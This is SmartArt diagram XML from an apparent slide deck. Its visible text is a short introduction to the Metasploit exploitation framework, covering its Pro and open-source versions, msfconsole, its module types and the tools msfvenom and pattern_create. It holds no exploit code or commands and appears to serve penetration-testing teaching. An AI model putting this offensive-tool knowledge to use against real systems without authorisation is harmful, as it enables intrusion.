      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DFEB34D-806D-485B-8E28-51FEF3AA1A4C}" type="parTrans" cxnId="{E9CE7BB5-DE94-41FB-9A56-22602D727FE1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D351C0FF-463A-4C36-A591-56BAD0887741}" type="sibTrans" cxnId="{E9CE7BB5-DE94-41FB-9A56-22602D727FE1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" type="pres">
      <dgm:prSet presAssocID="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" type="pres">
      <dgm:prSet presAssocID="{90758AD1-037B-474C-89A6-53EDE0858175}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0AC4A74-AA0A-4A97-A54B-95B3F696A76E}" type="pres">
      <dgm:prSet presAssocID="{1871F033-38D9-4D64-8BF4-726B16026788}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6556AB75-E671-47A5-873B-916EC07768D4}" type="pres">
      <dgm:prSet presAssocID="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A374F716-E283-49A7-9478-F43C7A252EBD}" type="pres">
      <dgm:prSet presAssocID="{59A9220E-0EB0-4E51-B39D-C33D25AA62F8}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1787256F-ABA0-4DA3-BE17-5FCCF1F4E59F}" type="pres">
      <dgm:prSet presAssocID="{6F8D6BEA-2F05-4B48-AB40-C4C15A783145}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68A56802-D34D-41C6-B761-514A60638A6B}" type="pres">
      <dgm:prSet presAssocID="{22655585-66F0-4D85-94A3-94CEFCE63B19}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{83C4CBFC-67B9-40FF-BE11-D6F2FA892C87}" type="pres">
      <dgm:prSet presAssocID="{805C2808-20AF-40A9-BBB6-44E200E65079}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2ACC3AD-FC71-4F3B-B04B-BFF8438A5E78}" type="pres">
      <dgm:prSet presAssocID="{FED8CBBB-200F-4AAA-B8C6-87BEE6778C65}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FA681EE-CD68-40DA-A3F5-A7756E995A9B}" type="pres">
      <dgm:prSet presAssocID="{42C2919B-50EC-460D-B3B1-EEB7ADC655BE}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{275832E5-CED2-4582-81CF-69A4A34DA463}" type="pres">
      <dgm:prSet presAssocID="{CCDB8045-7FDC-4FE2-85D0-AA8761B95853}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11BA2360-C4E1-4F61-854A-21BC11370288}" type="pres">
      <dgm:prSet presAssocID="{A58B9BC7-EBA8-4761-A654-2D392D673B56}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{AA398813-72D4-41E6-A775-2DAA48F56462}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{6F8D6BEA-2F05-4B48-AB40-C4C15A783145}" srcOrd="2" destOrd="0" parTransId="{93A18ECA-9804-4E13-8750-4AF7B1DAE5E7}" sibTransId="{22655585-66F0-4D85-94A3-94CEFCE63B19}"/>
    <dgm:cxn modelId="{73663B16-C68B-4083-BC3A-4C219D2981F6}" type="presOf" srcId="{F6B3CE81-98CE-4183-9D53-17DC175FF69B}" destId="{6556AB75-E671-47A5-873B-916EC07768D4}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8380B11D-35DC-4690-BCD0-31E3306BDA71}" type="presOf" srcId="{805C2808-20AF-40A9-BBB6-44E200E65079}" destId="{83C4CBFC-67B9-40FF-BE11-D6F2FA892C87}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{BF577922-9919-4966-853B-53706EB87745}" srcId="{90758AD1-037B-474C-89A6-53EDE0858175}" destId="{9979B333-458E-4B4E-AF07-6A8C240BCE71}" srcOrd="3" destOrd="0" parTransId="{1E8F4250-AB94-4911-A1B4-249291DFCEA0}" sibTransId="{9DC497B7-BCCD-4B87-B348-3934D4F1AA6B}"/>
    <dgm:cxn modelId="{6653C823-203A-4F24-8182-F54DADD1D6F4}" type="presOf" srcId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" destId="{6556AB75-E671-47A5-873B-916EC07768D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{5528FE29-B0F6-4B21-BD49-BEE9CF6B20D3}" srcId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" destId="{E8ADE5CF-20AF-4A02-9CBB-31C5E232AF08}" srcOrd="0" destOrd="0" parTransId="{412DB805-2892-4D6A-99ED-7FDFAC275F6A}" sibTransId="{7AF74C24-33E4-40ED-BBE0-8C63223A46F7}"/>
    <dgm:cxn modelId="{02B3713C-840C-45D1-8F69-86B2500CAE64}" srcId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" destId="{F6B3CE81-98CE-4183-9D53-17DC175FF69B}" srcOrd="2" destOrd="0" parTransId="{537D8FCE-E00B-45E0-AFF6-0CF1FAE5F6E8}" sibTransId="{94C09812-0595-4E05-937A-9B356B94DF8C}"/>
    <dgm:cxn modelId="{47BB025C-E4A5-4A22-AA66-AE21A80EA009}" srcId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" destId="{2D017B98-E9FE-4D72-87C9-A93354B5E0F6}" srcOrd="1" destOrd="0" parTransId="{2D0AC334-3596-4FAA-ACE0-D5C215D002E1}" sibTransId="{9FD2F8BC-6E2A-469A-9C51-4E18570EB13D}"/>
    <dgm:cxn modelId="{AC55E36D-C71D-41D7-9613-37BA3AED31B0}" type="presOf" srcId="{6F8D6BEA-2F05-4B48-AB40-C4C15A783145}" destId="{1787256F-ABA0-4DA3-BE17-5FCCF1F4E59F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B8A79C73-B904-4AB8-9444-B76223075442}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{805C2808-20AF-40A9-BBB6-44E200E65079}" srcOrd="3" destOrd="0" parTransId="{88FDCC9B-6863-48A0-8CA8-8A7E095755F5}" sibTransId="{FED8CBBB-200F-4AAA-B8C6-87BEE6778C65}"/>
    <dgm:cxn modelId="{B976AA56-EEBA-42C2-8803-8768B346AC10}" type="presOf" srcId="{A58B9BC7-EBA8-4761-A654-2D392D673B56}" destId="{11BA2360-C4E1-4F61-854A-21BC11370288}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{FFD78057-1031-43E7-9582-7F75B148B087}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{90758AD1-037B-474C-89A6-53EDE0858175}" srcOrd="0" destOrd="0" parTransId="{FEAA2E06-3747-445E-A5E9-B1B8B5515AE0}" sibTransId="{1871F033-38D9-4D64-8BF4-726B16026788}"/>
    <dgm:cxn modelId="{A458627B-D871-43D8-BCA3-40DB5B99E427}" srcId="{90758AD1-037B-474C-89A6-53EDE0858175}" destId="{4D86A241-97FF-4773-9ECF-5D5C82E261CE}" srcOrd="2" destOrd="0" parTransId="{8B1F6FDE-5E13-45D3-8BE3-06325A259D7E}" sibTransId="{8E5596A8-8044-47B9-A318-D8505A837C88}"/>
    <dgm:cxn modelId="{93B6707D-BC83-475D-B364-48A12335D336}" type="presOf" srcId="{4D86A241-97FF-4773-9ECF-5D5C82E261CE}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{89A16D80-7561-4D47-875E-6D15160792B8}" srcId="{90758AD1-037B-474C-89A6-53EDE0858175}" destId="{354768C2-EE63-4475-B73A-5CD9F0B96F74}" srcOrd="1" destOrd="0" parTransId="{0124DFA5-5037-4E7B-867F-9A91DAD83BFC}" sibTransId="{CDA87040-3BCC-43D2-BCFE-5EAC88D178D6}"/>
    <dgm:cxn modelId="{C42A078B-0C72-4709-8A0A-4D7AB75FC8D3}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}" srcOrd="1" destOrd="0" parTransId="{F56C6B83-8A16-4072-BE89-BD416E066BDB}" sibTransId="{59A9220E-0EB0-4E51-B39D-C33D25AA62F8}"/>
    <dgm:cxn modelId="{5A44008E-6D61-4FB4-A8FF-9F02758EEB57}" type="presOf" srcId="{9979B333-458E-4B4E-AF07-6A8C240BCE71}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{EFF30D95-6D5E-4BB3-A802-BF8D6347F40D}" type="presOf" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B9D29AA1-F000-418C-B689-84F23E00585A}" type="presOf" srcId="{382515D6-C04A-41D5-A662-FA1DEAA72D79}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{710DCBB4-925D-4581-A9BB-C2437E12C154}" type="presOf" srcId="{42C2919B-50EC-460D-B3B1-EEB7ADC655BE}" destId="{3FA681EE-CD68-40DA-A3F5-A7756E995A9B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E9CE7BB5-DE94-41FB-9A56-22602D727FE1}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{A58B9BC7-EBA8-4761-A654-2D392D673B56}" srcOrd="5" destOrd="0" parTransId="{5DFEB34D-806D-485B-8E28-51FEF3AA1A4C}" sibTransId="{D351C0FF-463A-4C36-A591-56BAD0887741}"/>
    <dgm:cxn modelId="{302B13BA-8415-499D-9F97-9B7D27408894}" type="presOf" srcId="{354768C2-EE63-4475-B73A-5CD9F0B96F74}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{217CCEC8-1F19-49A8-938B-B3651FD64F78}" type="presOf" srcId="{90758AD1-037B-474C-89A6-53EDE0858175}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B6FDEAD1-C279-4986-AB57-62CCF1F3B0D7}" srcId="{90758AD1-037B-474C-89A6-53EDE0858175}" destId="{382515D6-C04A-41D5-A662-FA1DEAA72D79}" srcOrd="0" destOrd="0" parTransId="{012BC8CF-8AFA-44AD-9DA0-FADE9CAE725C}" sibTransId="{58F38959-B764-4557-BE6C-2A4EAEDCFDE8}"/>
    <dgm:cxn modelId="{529E84D2-6AAC-4550-9E99-476E3ADD9E74}" type="presOf" srcId="{E8ADE5CF-20AF-4A02-9CBB-31C5E232AF08}" destId="{6556AB75-E671-47A5-873B-916EC07768D4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{43C07ED4-5FF8-4D0E-8114-C6828347E053}" type="presOf" srcId="{2D017B98-E9FE-4D72-87C9-A93354B5E0F6}" destId="{6556AB75-E671-47A5-873B-916EC07768D4}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{6AE54BE6-15F3-44E4-8CE5-F3F8E0F99852}" srcId="{D2CABFEE-A6E7-4C79-B243-3FDE73D096E9}" destId="{42C2919B-50EC-460D-B3B1-EEB7ADC655BE}" srcOrd="4" destOrd="0" parTransId="{1EA13C01-4E6F-485C-889B-0DC08E153131}" sibTransId="{CCDB8045-7FDC-4FE2-85D0-AA8761B95853}"/>
    <dgm:cxn modelId="{47501F17-5DBB-4DCC-83FD-123B303C8E77}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{23DA984D-9BFF-4512-8A99-EAB101533A67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E27365CE-AD26-40B7-8374-6CE1C1534873}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{C0AC4A74-AA0A-4A97-A54B-95B3F696A76E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{75EAA14C-373B-474D-B38B-B5634D2B92B9}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{6556AB75-E671-47A5-873B-916EC07768D4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{640CB3F2-C37F-4BE1-A9CD-4F60DE20C679}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{A374F716-E283-49A7-9478-F43C7A252EBD}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C93DC5CB-4C13-4BF0-A767-99A978FF7BD2}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{1787256F-ABA0-4DA3-BE17-5FCCF1F4E59F}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{7926FC81-0551-4512-917A-DA0C014B9195}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{68A56802-D34D-41C6-B761-514A60638A6B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D32F1A65-9C69-4377-8182-FED10C918BC6}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{83C4CBFC-67B9-40FF-BE11-D6F2FA892C87}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{10D415C8-4A99-4567-A60B-026BC30AACD3}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{A2ACC3AD-FC71-4F3B-B04B-BFF8438A5E78}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{4EEB976D-CDDD-4163-B988-E5C25E7EFD8D}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{3FA681EE-CD68-40DA-A3F5-A7756E995A9B}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A3272B36-08E2-48F2-8AD5-6AA221B602C3}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{275832E5-CED2-4582-81CF-69A4A34DA463}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A0E6E1B1-6BF9-4CA8-8E18-1143DBBC572C}" type="presParOf" srcId="{084D4C39-5270-4E12-BB13-94A99B2779C3}" destId="{11BA2360-C4E1-4F61-854A-21BC1137028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B4467E-CDAD-4A92-86B3-460FFE55652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C79C5E2-22DB-492F-918E-4381259D74DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0" dirty="0"/>
            <a:t>Metasploit is the most popular exploitation framework</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A317EA6A-2698-4ED5-8EF5-CE0C32065B56}" type="parTrans" cxnId="{8E18F449-2DDB-4EFE-8550-00C5EDB4A890}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1CCB6E6-223C-4724-AF49-D844CB24A1AB}" type="sibTrans" cxnId="{8E18F449-2DDB-4EFE-8550-00C5EDB4A890}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC66D02A-5A22-4B0B-B09C-33A83E6AEE40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Metasploit Versions:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C3CA703-C1E0-4164-A4CC-93F22DED029D}" type="parTrans" cxnId="{AA88DE23-7BAE-4766-8687-C84E7EA2E4DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8573465F-7E9C-4F8C-9584-4ACE89DB0FC9}" type="sibTrans" cxnId="{AA88DE23-7BAE-4766-8687-C84E7EA2E4DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9DEE684-1ACF-4CF2-8234-880F69897954}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Metasploit Pro:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Commercial, with GUI, for automation and task management.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FEE2CF3-84E2-4B44-AF66-0008913B273A}" type="parTrans" cxnId="{A1A37AB9-1372-4963-8880-EFF785D4F323}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A63675E-17D2-4758-AEC9-00E120F6F7D0}" type="sibTrans" cxnId="{A1A37AB9-1372-4963-8880-EFF785D4F323}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D725EC2-40E0-45A5-9A9D-A2ECE71F7AAB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Metasploit Framework:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Open-source, command-line-based, widely used in penetration testing.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF6EE85E-7A7E-430C-B511-6678D623B7B9}" type="parTrans" cxnId="{AEEA7035-C499-4B31-AB1F-D0755F3D3D91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A28B39E1-1EAF-4A55-87E1-36F7F34C5E3C}" type="sibTrans" cxnId="{AEEA7035-C499-4B31-AB1F-D0755F3D3D91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE670228-4136-4FF9-839E-9569591B4F46}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Main Components:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3A7140A-BAAC-4E7D-851F-3256036E5504}" type="parTrans" cxnId="{079BA937-0DEB-4754-951A-4C8117288018}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2717862E-B7E0-41F2-AAEA-DD4258DC2F99}" type="sibTrans" cxnId="{079BA937-0DEB-4754-951A-4C8117288018}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB970D74-91F1-4F49-8537-458188927989}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>msfconsole:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Command-line interface.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04331F20-7E80-4AE0-A504-931B7759E57C}" type="parTrans" cxnId="{E30A1202-1AB6-48DE-AAB3-0F15BA412A70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C70209A0-77B9-4F6A-87D9-BD7471CB2D80}" type="sibTrans" cxnId="{E30A1202-1AB6-48DE-AAB3-0F15BA412A70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B82D20A2-7666-40A1-87CC-75E7381F04CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Modules:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Exploits, scanners, payloads, etc.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5AE90DCC-C7BD-4ACD-9287-91B095D7B3A3}" type="parTrans" cxnId="{DD3114B1-60FF-41B9-B8EC-A09B988A0845}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F25BB13-2303-4998-810E-442DC8B22580}" type="sibTrans" cxnId="{DD3114B1-60FF-41B9-B8EC-A09B988A0845}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CDC4C92D-9D3C-43D6-A328-8ED1A922499C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Tools:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Vulnerability research tools like msfvenom, pattern_create, etc.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{043AEA94-C1A9-4EC5-A44F-BA46C59DB550}" type="parTrans" cxnId="{1385431E-0242-4B28-BB80-2DC4DF9CE3FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9250E001-5C44-4DB7-8501-1FE7B7D6EB29}" type="sibTrans" cxnId="{1385431E-0242-4B28-BB80-2DC4DF9CE3FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" type="pres">
      <dgm:prSet presAssocID="{43B4467E-CDAD-4A92-86B3-460FFE556520}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4574B46-B3AB-420C-9ACE-8FB24A04CA82}" type="pres">
      <dgm:prSet presAssocID="{7C79C5E2-22DB-492F-918E-4381259D74DC}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8BA7C88-E234-4D1C-BE18-25C9F8C5B15A}" type="pres">
      <dgm:prSet presAssocID="{C1CCB6E6-223C-4724-AF49-D844CB24A1AB}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
